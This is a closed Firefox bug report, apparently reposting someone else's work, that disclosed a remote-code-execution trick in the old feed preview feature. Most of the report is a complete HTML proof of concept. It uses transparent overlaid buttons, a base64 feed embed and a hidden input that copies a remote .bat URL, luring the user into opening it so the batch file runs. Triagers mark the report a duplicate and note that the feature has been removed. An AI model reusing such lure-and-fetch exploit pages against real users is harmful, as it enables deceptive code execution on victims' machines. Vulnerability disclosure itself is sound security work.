Closed Bug 1746211 Opened 3 years ago Closed 3 years ago

RCE Vulnerability

Categories

(Firefox :: Untriaged, defect)

Firefox 95
defect

RESOLVED DUPLICATE of bug 1422231

People

(Reporter: theft, Unassigned)

Attachments

(1 file)

1.61 KB, text/html
Attached file test.html

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0

Steps to reproduce:

<html>
<head>
<title>Firefox RCE</title>
<style>
#qdiv{
border:0px solid red;
width:400px;
height:300px;
}

#qem{
width:400px;
height:300px;

opacity:0.5;

}

#qbutt{
position:absolute;
top:125px;
left:235px;
width:105px;
}

#qclick{
position:absolute;
top:50px;
left:110px;
width:145px;
}

#qcopy{
position:absolute;
z-index:1000;
}
#qin{
opacity:0.0;
}

#qmsg{
position:absolute;
z-index:9000;
top:50px;
left:270px;
}
</style>
</head>
<body>
<button id="qcopy">Click here first to copy URL</button>
<div id="qdiv"><button id="qbutt">Click here last</button>
<button id="qclick">Click here second</button><div id="qmsg">Then click 'choose app' then paste URL and press 'open'</div>
<embed id="qem" type="application/vnd.mozilla.maybe.feed" src="data:application/vnd.mozilla.maybe.feed;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4NCjxmZWVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDA1L0F0b20iPg0KICA8dGl0bGU+cTwvdGl0bGU+DQogIDxsaW5rIGhyZWY9InEiLz4NCiAgPHVwZGF0ZWQ+cTwvdXBkYXRlZD4NCiAgPGF1dGhvcj4NCiAgICA8bmFtZT5xPC9uYW1lPg0KICA8L2F1dGhvcj4NCiAgPGlkPnE8L2lkPg0KICANCiAgPGVudHJ5Pg0KPHRpdGxlIHR5cGU9InhodG1sIj4NCiAgPGRpdiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQogICAgPGI+djxpPmFsPC9pPmlkIDxxPmh0bWw8L3E+PC9iPg0KICA8L2Rpdj4NCjwvdGl0bGU+DQogICAgPHVwZGF0ZWQ+cTwvdXBkYXRlZD4NCiAgICA8c3VtbWFyeT5xPC9zdW1tYXJ5Pg0KICA8L2VudHJ5Pg0KPC9mZWVkPg==" ></body>

</div>
<input id="qin" type="text" value="http://leucosite.com/a.bat"/>

<script>

qcopy.addEventListener("click", function(){qin.select();
document.execCommand("Copy");});
</script>
</body>
</html>

Actual results:

Execution of the batch file from link.

Expected results:

NA, self-explanatory

Type: enhancement → defect

qab is pretty clear that this is fixed on their site, and the feed preview feature got removed, so this doesn't do anything anymore.

Please don't post other people's content without referencing it.

Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Resolution: --- → DUPLICATE